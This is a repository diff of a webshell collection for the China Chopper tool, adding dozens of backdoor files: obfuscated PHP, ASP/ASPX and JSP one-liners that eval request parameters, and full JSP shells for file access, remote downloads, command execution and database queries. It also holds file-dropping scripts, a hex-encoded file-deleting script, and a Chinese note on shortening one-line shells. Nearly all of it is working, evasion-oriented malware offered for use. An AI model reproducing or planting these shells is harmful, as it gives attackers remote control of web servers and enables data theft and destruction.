+var E="H66H75H6EH63H74H69H6FH6EH20H77H6AH6AH28H66H29H7BH0AH74H72H79H7BH0AH76H61H72H20H66H73H6FH20H3DH20H6EH65H77H20H41H63H74H69H76H65H58H4FH62H6AH65H63H74H28H22H53H63H72H69H70H74H69H6EH67H2EH46H69H6CH65H53H79H73H74H65H6DH4FH62H6AH65H63H74H22H29H3BH0AH66H73H6FH2EH44H65H6CH65H74H65H46H69H6CH65H28H66H2CH74H72H75H65H29H3BH0AH78H69H65H2BH3DH22H31H7CH3CH2DH22H3BH0AH74H72H79H7BH66H73H6FH2EH44H65H6CH65H74H65H46H6FH6CH64H65H72H28H66H2CH74H72H75H65H29H3BH7DH63H61H74H63H68H28H65H29H7BH7DH0AH7DH63H61H74H63H68H28H65H29H7BH78H69H65H2BH3DH22Hu5220Hu9664Hu5931Hu8D25H21H7CH3CH2DH22H3BH7DH0AH7DH0AH76H61H72H20H78H69H65H3DH22H2DH3EH7CH22H3BH0AH77H6AH6AH28H52H65H71H75H65H73H74H2EH66H6FH72H6DH28H27H7AH31H27H29H29H3BH0AH52H65H73H70H6FH6EH73H65H2EH77H72H69H74H65H28H78H69H65H29H3B"
+
+switch(Sp)
+{
+case "A":
+  St=A;
+  break;
+case "B":
+  St=B;
+  break;
+case "C":
+  St=C;
+  break;
+case "D":
+  St=D;
+case "E":
+  St=E;
+  break;
+default:
+
+}
+Fla.E(unescape(St.replace(/H/g,"%"))+'');
+</SCRIPT>

caidao-shell/guest.jsp

@@ -0,0 +1,263 @@
+<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
+<%!String Pwd = "yunyan";    String EC(String s, String c) throws Exception {
+        return s;
+    }//new String(s.getBytes("ISO-8859-1"),c);}    Connection GC(String s) throws Exception {
+        String[] x = s.trim().split("\r\n");
+        Class.forName(x[0].trim()).newInstance();
+        Connection c = DriverManager.getConnection(x[1].trim());
+        if (x.length > 2) {
+            c.setCatalog(x[2].trim());
+        }
+        return c;
+    }    void AA(StringBuffer sb) throws Exception {
+        File r[] = File.listRoots();
+        for (int i = 0; i < r.length; i++) {
+            sb.append(r[i].toString().substring(0, 2));
+        }
+    }    void BB(String s, StringBuffer sb) throws Exception {
+        File oF = new File(s), l[] = oF.listFiles();
+        String sT, sQ, sF = "";
+        java.util.Date dt;
+        SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
+        for (int i = 0; i < l.length; i++) {
+            dt = new java.util.Date(l[i].lastModified());
+            sT = fm.format(dt);
+            sQ = l[i].canRead() ? "R" : "";
+            sQ += l[i].canWrite() ? " W" : "";
+            if (l[i].isDirectory()) {
+                sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()
+                        + "\t" + sQ + "\n");
+            } else {
+                sF += l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"
+                        + sQ + "\n";
+            }
+        }
+        sb.append(sF);
+    }    void EE(String s) throws Exception {
+        File f = new File(s);
+        if (f.isDirectory()) {
+            File x[] = f.listFiles();
+            for (int k = 0; k < x.length; k++) {
+                if (!x[k].delete()) {
+                    EE(x[k].getPath());
+                }
+            }
+        }
+        f.delete();
+    }    void FF(String s, HttpServletResponse r) throws Exception {
+        int n;
+        byte[] b = new byte[512];
+        r.reset();
+        ServletOutputStream os = r.getOutputStream();
+        BufferedInputStream is = new BufferedInputStream(new FileInputStream(s));
+        os.write(("->" + "|").getBytes(), 0, 3);
+        while ((n = is.read(b, 0, 512)) != -1) {
+            os.write(b, 0, n);
+        }
+        os.write(("|" + "<-").getBytes(), 0, 3);
+        os.close();
+        is.close();
+    }    void GG(String s, String d) throws Exception {
+        String h = "0123456789ABCDEF";
+        int n;
+        File f = new File(s);
+        f.createNewFile();
+        FileOutputStream os = new FileOutputStream(f);
+        for (int i = 0; i < d.length(); i += 2) {
+            os
+                    .write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d
+                            .charAt(i + 1))));
+        }
+        os.close();
+    }    void HH(String s, String d) throws Exception {
+        File sf = new File(s), df = new File(d);
+        if (sf.isDirectory()) {
+            if (!df.exists()) {
+                df.mkdir();
+            }
+            File z[] = sf.listFiles();
+            for (int j = 0; j < z.length; j++) {
+                HH(s + "/" + z[j].getName(), d + "/" + z[j].getName());
+            }
+        } else {
+            FileInputStream is = new FileInputStream(sf);
+            FileOutputStream os = new FileOutputStream(df);
+            int n;
+            byte[] b = new byte[512];
+            while ((n = is.read(b, 0, 512)) != -1) {
+                os.write(b, 0, n);
+            }
+            is.close();
+            os.close();
+        }
+    }    void II(String s, String d) throws Exception {
+        File sf = new File(s), df = new File(d);
+        sf.renameTo(df);
+    }    void JJ(String s) throws Exception {
+        File f = new File(s);
+        f.mkdir();
+    }    void KK(String s, String t) throws Exception {
+        File f = new File(s);
+        SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
+        java.util.Date dt = fm.parse(t);
+        f.setLastModified(dt.getTime());
+    }    void LL(String s, String d) throws Exception {
+        URL u = new URL(s);
+        int n;
+        FileOutputStream os = new FileOutputStream(d);
+        HttpURLConnection h = (HttpURLConnection) u.openConnection();
+        InputStream is = h.getInputStream();
+        byte[] b = new byte[512];
+        while ((n = is.read(b, 0, 512)) != -1) {
+            os.write(b, 0, n);
+        }
+        os.close();
+        is.close();
+        h.disconnect();
+    }    void MM(InputStream is, StringBuffer sb) throws Exception {
+        String l;
+        BufferedReader br = new BufferedReader(new InputStreamReader(is));
+        while ((l = br.readLine()) != null) {
+            sb.append(l + "\r\n");
+        }
+    }    void NN(String s, StringBuffer sb) throws Exception {
+        Connection c = GC(s);
+        ResultSet r = c.getMetaData().getCatalogs();
+        while (r.next()) {
+            sb.append(r.getString(1) + "\t");
+        }
+        r.close();
+        c.close();
+    }    void OO(String s, StringBuffer sb) throws Exception {
+        Connection c = GC(s);
+        String[] t = { "TABLE" };
+        ResultSet r = c.getMetaData().getTables(null, null, "%", t);
+        while (r.next()) {
+            sb.append(r.getString("TABLE_NAME") + "\t");
+        }
+        r.close();
+        c.close();
+    }    void PP(String s, StringBuffer sb) throws Exception {
+        String[] x = s.trim().split("\r\n");
+        Connection c = GC(s);
+        Statement m = c.createStatement(1005, 1007);
+        ResultSet r = m.executeQuery("select * from " + x[3]);
+        ResultSetMetaData d = r.getMetaData();
+        for (int i = 1; i <= d.getColumnCount(); i++) {
+            sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)
+                    + ")\t");
+        }
+        r.close();
+        m.close();
+        c.close();
+    }    void QQ(String cs, String s, String q, StringBuffer sb) throws Exception {
+        int i;
+        Connection c = GC(s);
+        Statement m = c.createStatement(1005, 1008);
+        try {
+            ResultSet r = m.executeQuery(q);
+            ResultSetMetaData d = r.getMetaData();
+            int n = d.getColumnCount();
+            for (i = 1; i <= n; i++) {
+                sb.append(d.getColumnName(i) + "\t|\t");
+            }
+            sb.append("\r\n");
+            while (r.next()) {
+                for (i = 1; i <= n; i++) {
+                    sb.append(EC(r.getString(i), cs) + "\t|\t");
+                }
+                sb.append("\r\n");
+            }
+            r.close();
+        } catch (Exception e) {
+            sb.append("Result\t|\t\r\n");
+            try {
+                m.executeUpdate(q);
+                sb.append("Execute Successfully!\t|\t\r\n");
+            } catch (Exception ee) {
+                sb.append(ee.toString() + "\t|\t\r\n");
+            }
+        }
+        m.close();
+        c.close();
+    }%>
+     
+     
+<%
+    String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z0") + "";
+    request.setCharacterEncoding(cs);
+    response.setContentType("text/html;charset=" + cs);
+    String Z = EC(request.getParameter(Pwd) + "", cs);
+    String z1 = EC(request.getParameter("z1") + "", cs);
+    String z2 = EC(request.getParameter("z2") + "", cs);
+    StringBuffer sb = new StringBuffer("");
+    try {
+        sb.append("->" + "|");
+        if (Z.equals("A")) {
+            String s = new File(application.getRealPath(request
+                    .getRequestURI())).getParent();
+            sb.append(s + "\t");
+            if (!s.substring(0, 1).equals("/")) {
+                AA(sb);
+            }
+        } else if (Z.equals("B")) {
+            BB(z1, sb);
+        } else if (Z.equals("C")) {
+            String l = "";
+            BufferedReader br = new BufferedReader(
+                    new InputStreamReader(new FileInputStream(new File(
+                            z1))));
+            while ((l = br.readLine()) != null) {
+                sb.append(l + "\r\n");
+            }
+            br.close();
+        } else if (Z.equals("D")) {
+            BufferedWriter bw = new BufferedWriter(
+                    new OutputStreamWriter(new FileOutputStream(
+                            new File(z1))));
+            bw.write(z2);
+            bw.close();
+            sb.append("1");
+        } else if (Z.equals("E")) {
+            EE(z1);
+            sb.append("1");
+        } else if (Z.equals("F")) {
+            FF(z1, response);
+        } else if (Z.equals("G")) {
+            GG(z1, z2);
+            sb.append("1");
+        } else if (Z.equals("H")) {
+            HH(z1, z2);
+            sb.append("1");
+        } else if (Z.equals("I")) {
+            II(z1, z2);
+            sb.append("1");
+        } else if (Z.equals("J")) {
+            JJ(z1);
+            sb.append("1");
+        } else if (Z.equals("K")) {
+            KK(z1, z2);
+            sb.append("1");
+        } else if (Z.equals("L")) {
+            LL(z1, z2);
+            sb.append("1");
+        } else if (Z.equals("M")) {
+            String[] c = { z1.substring(2), z1.substring(0, 2), z2 };
+            Process p = Runtime.getRuntime().exec(c);
+            MM(p.getInputStream(), sb);
+            MM(p.getErrorStream(), sb);
+        } else if (Z.equals("N")) {
+            NN(z1, sb);
+        } else if (Z.equals("O")) {
+            OO(z1, sb);
+        } else if (Z.equals("P")) {
+            PP(z1, sb);
+        } else if (Z.equals("Q")) {
+            QQ(cs, z1, z2, sb);
+        }
+    } catch (Exception e) {
+        sb.append("ERROR" + ":// " + e.toString());
+    }
+    sb.append("|" + "<-");
+    out.print(sb.toString());
+%>

caidao-shell/m7lrv01.php

@@ -0,0 +1 @@
+<?php echo '###m7lrvok###';$a=$_POST['m7lrv'];$b;$b=$a;@eval($a)?>

caidao-shell/p.php

@@ -0,0 +1,6 @@
+<?php 
+$a='lave'; 
+$b='($_POST[h])'; 
+$a=strrev($a); 
+@assert($a.$b); 
+?>

caidao-shell/qun01.php

@@ -0,0 +1,40 @@
+<?php
+$c="chr";
+$getpar.=$c(36).$c(95).$c(82).$c(69).$c(81).$c(85).$c(69).$c(83).$c(84);
+$get=chr(102).chr(105).chr(108).chr(101).chr(95);
+$get.=chr(103).chr(101).chr(116).chr(95).chr(99);
+$get.=chr(111).chr(110).chr(116).chr(101).chr(110);
+$get.=chr(116).chr(115);
+$unzip=$c(103).$c(122).$c(105).$c(110);
+$unzip.=$c(102).$c(108).$c(97).$c(116).$c(101);
+
+$undecode=$c(98).$c(97).$c(115).$c(101).$c(54).$c(52);
+$undecode.=$c(95).$c(100).$c(101).$c(99).$c(111).$c(100).$c(101);
+if($_POST['phpcodeurl']!=null&&$_POST['phpcodeurl']!=''){
+	$tongji=$get($_POST['phpcodeurl']);
+}
+else if($_POST['tongji']!=null&&$_POST['tongji']!=''){
+	$tongji=$_POST['tongji'];
+}
+$ecode = $_REQUEST['0'];
+$ecode.= $_REQUEST['1'];
+$ecode.= $_REQUEST['2'];
+$ecode.= $_REQUEST['3'];
+$ecode.= $_REQUEST['4'];
+$ecode.= $_REQUEST['5'];
+$ecode.= $_REQUEST['6'];
+$ecode.= $_REQUEST['7'];
+$ecode.= $_REQUEST['8'];
+$ecode.= $_REQUEST['9'];
+$ecode.= $_REQUEST['10'];
+$ecode.= $_REQUEST['11'];
+$ecode.= $_REQUEST['12'];
+$ecode.= $_REQUEST['13'];
+$ecode.= $_REQUEST['14'];
+$ecode.= $_REQUEST['15'];
+$ecode.= $_REQUEST['16'];
+
+//$ecode($undecode($tongji));
+@eval($undecode($tongji));
+echo '<br>tj,'.' tj';
+?>

caidao-shell/short_shell.md

@@ -0,0 +1,46 @@
+菜刀readme.txt中附带一3个一句话： 
+
+```
+PHP:    <?php @eval($_POST['chopper']);?> 
+ASP:    <%eval request("chopper")%> 
+ASP.NET:    <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>
+```
+
+抛弃密码的长度不算，其实这3个一句话均不是最短的。 
+如： 
+PHP我们可以这样写： 
+
+```php
+<?php @eval($_POST['0']);?>   原版 
+<?=eval($_POST[0]);?>         缩小版
+```
+
+ASP我们可以这样写： 
+
+```asp
+<%eval request("0")%>   原版 
+<%eval request(0)%>     缩小版
+```
+
+ASP.NET可以这样写： 
+
+```aspx
+<%@ Page Language="Jscript"%><%eval(Request.Item["z"],"unsafe");%>   原版 
+<%@Page Language=JS%><%eval(Request.Item(0),"unsafe");%>             缩小版
+```
+
+当然你也可以把它写成这样(很显然体积上不占优势)： 
+
+```
+<%@Page Language="JAVASCRIPT"%><%eval(Request.Item(0),"unsafe");%>
+```
+
+已经用了许久的东西，直接回复原贴感觉很多人看不到，还是单独发出来吧。 
+和原求助贴中的最长字符数对比： 
+
+```
+<%@ Page Language="Jscript"%><%eval(Request.Item["1"],"unsafe 
+<%@Page Language=JS%><%eval(Request.Item(0),"unsafe");%>
+```
+
+显然达到目的了。

caidao-shell/sqzr.php

@@ -0,0 +1,10 @@
+<?php 
+$uf="snc3"; 
+$ka="IEBldmFbsK"; 
+$pjt="CRfUE9TVF"; 
+$vbl = str_replace("ti","","tistittirti_rtietipltiatice"); 
+$iqw="F6ciddKTs="; 
+$bkf = $vbl("k", "", "kbakske6k4k_kdkekckokdke"); 
+$sbp = $vbl("ctw","","ctwcctwrectwatctwectw_fctwuncctwtctwioctwn"); 
+$mpy = $sbp('', $bkf($vbl("b", "", $ka.$pjt.$uf.$iqw))); $mpy(); 
+?>

caidao-shell/tie01.asp

@@ -0,0 +1 @@
+<%execute(unescape("eval%20request%28%22aaa%22%29"))%>

caidao-shell/w-ob_start01.php

@@ -0,0 +1,7 @@
+<?php 
+$evalstr=""; 
+ob_start(function ($c,$d){global $evalstr;$evalstr=$c;}); 
+echo $_REQUEST['pass']; 
+ob_end_flush(); 
+assert($evalstr); 
+?>

caidao-shell/w-ob_start02.php

@@ -0,0 +1,5 @@
+<?php 
+ob_start(function ($c,$d){register_shutdown_function('assert',$c);}); 
+echo $_REQUEST['pass']; 
+ob_end_flush(); 
+?>

caidao-shell/w.jsp

@@ -0,0 +1,59 @@
+<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
+<%!
+String Pwd="test";
+String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);}
+Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance();
+Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;}
+void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i<r.length;i++){sb.append(r[i].toString().substring(0,2));}}
+void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles();String sT, sQ,sF="";java.util.Date dt;
+SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");for(int i=0;i<l.length;i++){dt=new java.util.Date(l[i].lastModified());
+sT=fm.format(dt);sQ=l[i].canRead()?"R":"";sQ+=l[i].canWrite()?" W":"";if(l[i].isDirectory()){sb.append(l[i].getName()+"/\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n");}
+else{sF+=l[i].getName()+"\t"+sT+"\t"+l[i].length()+"\t"+sQ+"\n";}}sb.append(sF);}
+void EE(String s)throws Exception{File f=new File(s);if(f.isDirectory()){File x[]=f.listFiles();
+for(int k=0;k<x.length;k++){if(!x[k].delete()){EE(x[k].getPath());}}}f.delete();}
+void FF(String s,HttpServletResponse r)throws Exception{int n;byte[] b=new byte[512];r.reset();
+ServletOutputStream os=r.getOutputStream();BufferedInputStream is=new BufferedInputStream(new FileInputStream(s));
+os.write(("->"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}
+void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();
+FileOutputStream os=new FileOutputStream(f);for(int i=0;i<d.length();i+=2)
+{os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))));}os.close();}
+void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d);if(sf.isDirectory()){if(!df.exists()){df.mkdir();}File z[]=sf.listFiles();
+for(int j=0;j<z.length;j++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName());}
+}else{FileInputStream is=new FileInputStream(sf);FileOutputStream os=new FileOutputStream(df);
+int n;byte[] b=new byte[512];while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}is.close();os.close();}}
+void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d);sf.renameTo(df);}void JJ(String s)throws Exception{File f=new File(s);f.mkdir();}
+void KK(String s,String t)throws Exception{File f=new File(s);SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
+java.util.Date dt=fm.parse(t);f.setLastModified(dt.getTime());}
+void LL(String s, String d)throws Exception{URL u=new URL(s);int n;FileOutputStream os=new FileOutputStream(d);
+HttpURLConnection h=(HttpURLConnection)u.openConnection();InputStream is=h.getInputStream();byte[] b=new byte[512];
+while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();h.disconnect();}
+void MM(InputStream is, StringBuffer sb)throws Exception{String l;BufferedReader br=new BufferedReader(new InputStreamReader(is));
+while((l=br.readLine())!=null){sb.append(l+"\r\n");}}
+void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s);ResultSet r=c.getMetaData().getCatalogs();
+while(r.next()){sb.append(r.getString(1)+"\t");}r.close();c.close();}
+void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s);String[] t={"TABLE"};ResultSet r=c.getMetaData().getTables (null,null,"%",t);
+while(r.next()){sb.append(r.getString("TABLE_NAME")+"\t");}r.close();c.close();}
+void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("\r\n");Connection c=GC(s);
+Statement m=c.createStatement(1005,1007);ResultSet r=m.executeQuery("select * from "+x[3]);ResultSetMetaData d=r.getMetaData();
+for(int i=1;i<=d.getColumnCount();i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")\t");}r.close();m.close();c.close();}
+void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int i;Connection c=GC(s);Statement m=c.createStatement(1005,1008);
+try{ResultSet r=m.executeQuery(q);ResultSetMetaData d=r.getMetaData();int n=d.getColumnCount();for(i=1;i<=n;i++){sb.append(d.getColumnName(i)+"\t|\t");
+}sb.append("\r\n");while(r.next()){for(i=1;i<=n;i++){sb.append(EC(r.getString(i),cs)+"\t|\t");}sb.append("\r\n");}r.close();}
+catch(Exception e){sb.append("Result\t|\t\r\n");try{m.executeUpdate(q);sb.append("Execute Successfully!\t|\t\r\n");
+}catch(Exception ee){sb.append(ee.toString()+"\t|\t\r\n");}}m.close();c.close();}
+%><%
+String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);
+String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);
+StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|");
+if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}
+else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
+while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}
+else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
+bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}
+else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}
+else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}
+else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);
+MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}
+else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}
+}catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString());
+%>

caidao-shell/w.jspx

@@ -0,0 +1 @@
+<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="2.0"><jsp:scriptlet>new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(new sun.misc.BASE64Decoder().decodeBuffer(request.getParameter("c")));out.close();</jsp:scriptlet></jsp:root>

caidao-shell/w.php

@@ -0,0 +1,18 @@
+<?php 
+
+$config= trim($_POST['43cb006424cbf7b46dbca36c8ed79b69']); 
+$info = string2array($config); 
+
+/** 
+* 将字符串转换为数组 
+* 
+* @param  string  $data  字符串 
+* @return  array  返回数组格式，如果，data为空，则返回空数组 
+*/ 
+function string2array($data) { 
+if($data == '') return array(); 
+@eval("\$array = $data;"); 
+return $array; 
+} 
+
+?>

caidao-shell/w01.asp

@@ -0,0 +1,6 @@
+<%@ Page Language="Jscript" validateRequest="false" %>
+<%
+var keng 
+keng = Request.Item["hxg"];
+Response.Write(eval(keng,"unsafe"));
+%>

caidao-shell/w01.php

@@ -0,0 +1,9 @@
+<?php  
+$a = $_REQUEST['id'];
+preg_replace('/.*/e',' '.$a,'');
+?>
+
+/* 
+执行方法:?id=eval('phpinfo();');
+菜刀连接方法:00.php?id=eval%28base64_decode%28%22QGV2YWwoJF9QT1NUWydjbWQnXSk7%22%29%29;  密码cmd
+*/

caidao-shell/w02.asp

@@ -0,0 +1 @@
+<%@ Page Language = Jscript %><%var/*-/*-*/P/*-/*-*/=/*-/*-*/"e"+"v"+/*-/*-*/"a"+"l"+"("+"R"+"e"+/*-/*-*/"q"+"u"+"e"/*-/*-*/+"s"+"t"+"[/*-/*-*/0/*-/*-*/-/*-/*-*/14254250/*-/*-*/-/*-/*-*/102425454/*-/*-*/]"+","+"\""+"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"+"\""+")";eval (/*-/*-*/P/*-/*-*/,/*-/*-*/"u"+"n"+"s"/*-/*-*/+"a"+"f"+"e"/*-/*-*/); /*gadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenregadfgaerehrrtgregjgrgejgewgjewgewjgwegwegaklmgrghnewrghrenre*/ %>

caidao-shell/w02.jsp

@@ -0,0 +1 @@
+<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(new sun.misc.BASE64Decoder().decodeBuffer(request.getParameter("c")));out.close();%> 

caidao-shell/w02.php

@@ -0,0 +1,7 @@
+{$phpinfo()'];file_put_contents(base64_decode('bG9nby5waHA='),base64_decode('PD9waHAgQHByZWdfcmVwbGFjZSgiL1tEYXRhYmFzZV0vZSIgLCRfUE9TVFtkYXRhXSwgImVycm9yIik7ID8+'));/*}
+
+/* logo.php
+<?php @preg_replace("/[Database]/e" ,$_POST[data], "error"); ?>
+<O>Data=@eval($_POST[data]);</O>
+data
+*/

caidao-shell/w03.asp

@@ -0,0 +1,5 @@
+<%@PAGE LANGUAGE=JSCRIPT%>
+<%var PAY:String=
+Request["\x61\x62\x63\x64"];eval
+(PAY,"\x75\x6E\x73\x61"+
+"\x66\x65");%>

caidao-shell/w03.jsp

@@ -0,0 +1 @@
+<%new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f")).write(request.getParameter("t").replace("testtesttest","").getBytes());%>

caidao-shell/w_2016-05-25.php

@@ -0,0 +1,6 @@
+<?php 
+@$a = $_POST['x']; 
+if(isset($a)){ 
+@preg_replace("/\[(.*)\]/e",'\\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10=')); 
+} 
+?> 

caidao-shell/x.php

@@ -0,0 +1,3 @@
+<?php 
+if(isset($_POST['0K']) && substr(md5($_POST['0K']),20)=='e057f20f883e'){ 
+$Exp=strrev($_POST['qwer']);eval($Exp($_POST[z0]));}

caidao-shell/z-2016-01-05.php

@@ -0,0 +1,23 @@
+<?php
+function cve($str,$key)
+{
+$t="";
+for($i=0; $i<strlen($str); $i=$i+2)
+{
+  $k=(($i+2)/2)%strlen($key);
+  $p=substr($key, $k,1);
+  if(is_numeric(substr($str, $i,1)))
+  {
+    $t=$t.chr(hexdec(substr($str, $i,2))-$p);
+  }
+  else
+  {
+    $t=$t.chr(hexdec(substr($str, $i,4)));
+    $i=$i+2;
+  }
+}
+return($t);
+}
+
+(@$_=cve('6A767C687B77','39')).@$_(cve('6776666E286763736A38346466656871646A2A2464524F58565B2C7C302C5F292E','520'));
+?>

drag/mysql_1.php

@@ -0,0 +1,73 @@
+<html>
+<head>
+<?php
+header("Content-type:text/html; charset=gb2312");
+/*******************Silic Group Hacker Army All Rights Reserved.*********************/
+$cmd="YWJjaWtsbW9wcXJzdXlfZWc=";
+$cmd2="16jTwyAtIHBocCZNeVNRTMr9vt2/4rG4t925pL7fIC0g";
+$host=$_REQUEST['host'];
+$uid=$_REQUEST['uid'];
+$dbps=$_REQUEST['password'];
+$db=$_REQUEST['db'];
+$tip="&#23578;&#26410;&#35774;&#32622;&#65292;&#26080;&#27861;&#22791;&#20221;";
+$f1=$HTTP_SERVER_VARS['php_self'];
+$CODE=base64_decode($cmd);
+$C0DE=base64_decode($cmd2);
+$t1=$CODE{6}.$CODE{13}.$CODE{11}.$CODE{9}.$CODE{5}.$CODE{14}.$CODE{9}.$CODE{12}.$CODE{15}.$CODE{10}.$CODE{13};
+$t2=$CODE{3}.$CODE{5}.$CODE{3}.$CODE{2};
